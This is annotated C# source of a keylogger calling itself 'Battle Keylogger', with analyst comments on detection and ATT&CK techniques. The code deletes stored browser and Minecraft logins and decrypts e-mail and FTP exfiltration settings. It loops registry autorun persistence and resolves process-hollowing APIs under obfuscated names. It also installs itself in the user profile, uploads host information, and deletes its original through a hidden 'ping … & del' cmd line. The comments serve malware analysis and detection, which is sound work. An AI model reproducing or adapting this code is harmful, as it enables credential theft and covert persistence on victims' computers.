/// <summary>
/// Best-effort deletion of locally stored credential files for three applications:
/// the Minecraft launcher's <c>lastlogin</c> file, the "Login Data" and "Web Data" files under a
/// browser path decrypted at runtime, and several Firefox profile files (signons*, key3.db).
/// </summary>
/// <remarks>
/// Analyst notes (defensive reading of this block):
/// - Each of the three stages is wrapped in its own try/catch that reports to Config.DumpErrorLog,
///   so a failure in one stage does not stop the next.
/// - NOTE(review): in credential-logging malware, wiping stored logins is usually meant to make the
///   user type credentials again; the capture side is not visible in this block, so confirm elsewhere.
/// - Detection: a process other than the owning application deleting these credential-store files
///   in the user profile is a strong behavioural signal for file-system or EDR telemetry.
/// </remarks>
public static void DeleteSavedPasswords()
{
    // Stage 1: Minecraft launcher credential cache under %APPDATA%.
    try
    {
        File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\.minecraft\lastlogin");
    }
    catch (Exception ex)
    {
        Config.DumpErrorLog(ex, null);
    }

    // Stage 2: two files under %LOCALAPPDATA% + a path segment decrypted at runtime.
    // The "[CHROMEPATH]" placeholder hides the real path from static string scans; its
    // decrypted value is not visible here (presumably a Chrome profile directory — confirm).
    try
    {
        string chromePath = StringCipher.Decrypt("[CHROMEPATH]", Config.MUTEX);
        File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + chromePath + "Login Data");
        File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + chromePath + "Web Data");
    }
    catch (Exception ex)
    {
        Config.DumpErrorLog(ex, null);
    }

    // Stage 3: Firefox profile directories whose path contains ".default".
    try
    {
        foreach (string folder in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Application Data\Mozilla\Firefox\Profiles\"))
        {
            if (folder.Contains(".default"))
            {
                File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"\Login Data");
                File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"\signons.txt");
                File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"\signons2.txt");
                File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"\signons3.txt");
                File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"signons.sqlite");
                File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + folder + @"\key3.db");
            }
        }
    }
    catch (Exception ex)
    {
        Config.DumpErrorLog(ex, null);
    }
}
/// <summary>
/// Decrypts the configuration fields in place: each Config value is replaced by the result of
/// StringCipher.Decrypt(value, Config.MUTEX). Afterwards it normalises Config.FTP_SERVER to an
/// absolute URI where possible and builds Config.GUID from Config.HWID.
/// </summary>
/// <remarks>
/// Analyst notes (defensive reading of this block):
/// - Every call passes Config.MUTEX as the second argument, presumably the key or passphrase for
///   StringCipher (its implementation is not visible here — confirm). If so, recovering that single
///   value from a sample yields the whole configuration.
/// - The field names point to e-mail, FTP and web-panel settings. Once decrypted, the server, account
///   and panel values are the network indicators worth extracting for blocking and takedown.
/// - The fields are stored encrypted, so plain string scans of the binary will not show these
///   values (ATT&CK T1027, Obfuscated Files or Information).
/// </remarks>
public static void Decrypt()
{
    // E-mail settings.
    Config.EMAIL_USERNAME = StringCipher.Decrypt(Config.EMAIL_USERNAME, Config.MUTEX);
    Config.EMAIL_PASSWORD = StringCipher.Decrypt(Config.EMAIL_PASSWORD, Config.MUTEX);
    Config.EMAIL_PORT = StringCipher.Decrypt(Config.EMAIL_PORT, Config.MUTEX);
    Config.EMAIL_SERVER = StringCipher.Decrypt(Config.EMAIL_SERVER, Config.MUTEX);

    // FTP settings.
    Config.FTP_USERNAME = StringCipher.Decrypt(Config.FTP_USERNAME, Config.MUTEX);
    Config.FTP_PASSWORD = StringCipher.Decrypt(Config.FTP_PASSWORD, Config.MUTEX);
    Config.FTP_SERVER = StringCipher.Decrypt(Config.FTP_SERVER, Config.MUTEX);

    // If the decrypted server is not already an absolute URI, try it with an "ftp://" scheme
    // and keep that form only when it parses as well-formed; otherwise the value is left as-is.
    if (!Uri.IsWellFormedUriString(Config.FTP_SERVER, UriKind.Absolute))
    {
        if (Uri.IsWellFormedUriString("ftp://" + Config.FTP_SERVER, UriKind.Absolute))
        {
            Config.FTP_SERVER = "ftp://" + Config.FTP_SERVER;
        }
    }

    // Web-panel settings.
    Config.PHP_KEY = StringCipher.Decrypt(Config.PHP_KEY, Config.MUTEX);
    Config.WEBPANEL = StringCipher.Decrypt(Config.WEBPANEL, Config.MUTEX);

    // Identifier string built from the hardware ID; the fixed "{windows-[...]}" shape is a
    // constant of this code and may show up in outbound traffic or logs (usage not visible here).
    Config.GUID = "{windows-[" + Config.HWID + "]}";
}
/// <summary>
/// Writes the install path as a registry value under HKCU and/or HKLM, and keeps rewriting it in
/// a loop for as long as Config.REGISTRY_PERSISTENCE is non-empty.
/// </summary>
/// <param name="args">Object whose ToString() result is used as the path written to the registry.</param>
/// <remarks>
/// Analyst notes (defensive reading of this block):
/// - The subkey path is decrypted at runtime from the "[REGISTRYPATH]" placeholder, so it is not
///   visible here. Since the data written is the installed executable's path, it is presumably an
///   autorun key (ATT&CK T1547.001) — confirm by decrypting the value.
/// - Nothing inside the loop changes Config.REGISTRY_PERSISTENCE and no delay is visible, so when
///   the option is set the values are re-created continuously. Deleting them while the process is
///   alive will not hold; remediation has to stop the process first.
/// - Detection: a single process issuing a sustained stream of set-value operations on the same
///   registry value is a distinctive pattern in registry auditing or EDR telemetry.
/// - Both writes swallow every exception, so a failed write (for example, access denied on HKLM)
///   leaves no trace in the program's own error log.
/// </remarks>
private static void Startup(object args)
{
    string installPath = args.ToString();
    do
    {
        // Per-user value: name taken from Config.HKCU, data is the install path.
        try
        {
            if (!string.IsNullOrEmpty(Config.HKCU))
            {
                Registry.CurrentUser.OpenSubKey(StringCipher.Decrypt("[REGISTRYPATH]", Config.MUTEX), true).SetValue(Config.HKCU, installPath);
            }
        }
        catch { }

        // Machine-wide value: name taken from Config.HKLM, same data.
        try
        {
            if (!string.IsNullOrEmpty(Config.HKLM))
            {
                Registry.LocalMachine.OpenSubKey(StringCipher.Decrypt("[REGISTRYPATH]", Config.MUTEX), true).SetValue(Config.HKLM, installPath);
            }
        }
        catch { }
    }
    while (!string.IsNullOrEmpty(Config.REGISTRY_PERSISTENCE));
}
/// <summary>
/// Populates the Dynamic* delegate fields by resolving Windows API functions through
/// Core.CreateAPI, with each function name decrypted at runtime via StringCipher.Decrypt.
/// </summary>
/// <remarks>
/// Analyst notes (defensive reading of this block):
/// - The API names are held as encrypted placeholders and resolved dynamically. They will therefore
///   not appear in the binary's import table or as plain strings, which weakens import-based static
///   detection (ATT&CK T1027, T1106).
/// - The resolved set covers reading and writing another process's memory, allocating memory in it,
///   unmapping a section, getting and setting a thread context (native and WOW64), and resuming a
///   thread. This combination is commonly associated with process hollowing (ATT&CK T1055.012).
///   The call sites are not in this block, so treat that as a hypothesis to confirm.
/// - Detection is more reliable on behaviour than on names: cross-process memory writes followed
///   by a thread-context change and a resume of a suspended thread.
/// </remarks>
public static void Initialize()
{
    // Commented out in the original: CreateProcessW is not resolved by this method.
    //DynamicCreateProcess = Core.CreateAPI<CreateProcess>(Core.KERNEL32, StringCipher.Decrypt("[CreateProcessW]", Config.MUTEX));
    DynamicGetThreadContext = Core.CreateAPI <GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[GetThreadContext]", Config.MUTEX));
    // The only entry resolved from "ntdll" rather than Core.KERNEL32.
    DynamicNtUnmapViewOfSection = Core.CreateAPI <NtUnmapViewOfSection>("ntdll", StringCipher.Decrypt("[NtUnmapViewOfSection]", Config.MUTEX));
    DynamicReadProcessMemory = Core.CreateAPI <ReadProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[ReadProcessMemory]", Config.MUTEX));
    DynamicResumeThread = Core.CreateAPI <ResumeThread>(Core.KERNEL32, StringCipher.Decrypt("[ResumeThread]", Config.MUTEX));
    DynamicSetThreadContext = Core.CreateAPI <SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[SetThreadContext]", Config.MUTEX));
    DynamicVirtualAllocEx = Core.CreateAPI <VirtualAllocEx>(Core.KERNEL32, StringCipher.Decrypt("[VirtualAllocEx]", Config.MUTEX));
    DynamicWow64GetThreadContext = Core.CreateAPI <Wow64GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64GetThreadContext]", Config.MUTEX));
    DynamicWow64SetThreadContext = Core.CreateAPI <Wow64SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64SetThreadContext]", Config.MUTEX));
    DynamicWriteProcessMemory = Core.CreateAPI <WriteProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[WriteProcessMemory]", Config.MUTEX));
}
/// <summary>
/// Copies the running executable to a configured folder in the user profile, sends an installation
/// notification, optionally sets file attributes on the copy and deletes the original, then starts
/// the copy and exits the current process. Returns early if already running from the install path.
/// </summary>
/// <remarks>
/// Analyst notes (defensive reading of this block), with artefacts in order of execution:
/// - Drop location: one of %APPDATA%, %LOCALAPPDATA%, Documents or the temp directory, selected by
///   Config.PATH_TYPE ("1" to "4"), followed by Config.FOLDER_NAME\Config.FILE_NAME.
/// - A kernel32 DeleteFile call targets the install path plus a suffix decrypted from "[ZONEID]".
///   This is presumably the Zone.Identifier alternate data stream that carries Mark-of-the-Web
///   (ATT&CK T1553.005) — confirm by decrypting the placeholder.
/// - Core.Upload is called with the fixed subject "Battle Keylogger Installation Notification" and
///   host information from ComputerInformation.GetInformation(). The transport is not visible here;
///   the fixed strings are usable as content signatures.
/// - If Config.HIDE_FILE is set, two SetAttributes calls run back to back. File.SetAttributes
///   replaces the attribute set rather than adding to it, so the copy ends up with System only.
///   Hunting queries should therefore not rely on the Hidden flag (ATT&CK T1564.001).
/// - If Config.MELT_FILE is set, a hidden cmd process uses ping as a delay and then deletes the
///   original file (ATT&CK T1070.004). The "ping -n 3 127.0.0.1 > nul & del" command line is a
///   well-known pattern to alert on in process-creation logs.
/// - Most steps swallow exceptions silently; only the outer handler logs via Config.DumpErrorLog.
/// </remarks>
public static void Install()
{
    try
    {
        // Nothing to do when the process is already running from the install location.
        string runningPath = Application.ExecutablePath;
        if (runningPath.Equals(GetInstallPath()))
        {
            return;
        }

        // Pick the base directory; an unrecognised PATH_TYPE leaves the base empty.
        string installPath = string.Empty;
        if (Config.PATH_TYPE.Equals("1"))
        {
            installPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
        }
        else if (Config.PATH_TYPE.Equals("2"))
        {
            installPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
        }
        else if (Config.PATH_TYPE.Equals("3"))
        {
            installPath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
        }
        else if (Config.PATH_TYPE.Equals("4"))
        {
            // Drops the last character of the temp path (its trailing separator).
            installPath = Path.GetTempPath().Substring(0, Path.GetTempPath().Length - 1);
        }

        installPath += "\\" + Config.FOLDER_NAME;
        if (!Directory.Exists(installPath))
        {
            try
            {
                Directory.CreateDirectory(installPath);
            }
            catch { }
        }

        installPath += "\\" + Config.FILE_NAME;
        try
        {
            File.Copy(runningPath, installPath, true); //Drops file
        }
        catch { }

        // Deletes installPath + decrypted "[ZONEID]" suffix through a dynamically invoked
        // kernel32 DeleteFile rather than System.IO (see remarks; suffix value not visible here).
        try
        {
            Core.CallAPI <bool>("kernel32", "DeleteFile", new Type[] { typeof(string) }, installPath + StringCipher.Decrypt("[ZONEID]", Config.MUTEX));
        }
        catch { }

        // Installation notification carrying host information.
        Core.Upload("Battle Keylogger Installation Notification", "Battle Keylogger has been installed with the Galaxy Logger Installation Module" + Environment.NewLine + ComputerInformation.GetInformation(), "4");

        if (!string.IsNullOrEmpty(Config.HIDE_FILE))
        {
            try
            {
                // The second call overwrites the first: the final attribute set is System only.
                File.SetAttributes(installPath, FileAttributes.Hidden);
                File.SetAttributes(installPath, FileAttributes.System);
            }
            catch { }
        }

        if (!string.IsNullOrEmpty(Config.MELT_FILE))
        {
            try
            {
                // Windowless cmd child: ping acts as a short delay so the del runs after this
                // process has exited and released the original file.
                ProcessStartInfo info = new ProcessStartInfo();
                info.CreateNoWindow = true;
                info.UseShellExecute = false;
                info.FileName = "cmd";
                info.Arguments = "/c ping -n 3 127.0.0.1 > nul & del " + '"' + runningPath + '"';
                Process.Start(info);
            }
            catch { }
        }

        // Hand over to the installed copy and terminate this instance.
        Process.Start(installPath);
        //GC.Collect();
        Environment.Exit(0);
    }
    catch (Exception ex)
    {
        Config.DumpErrorLog(ex, null);
    }
}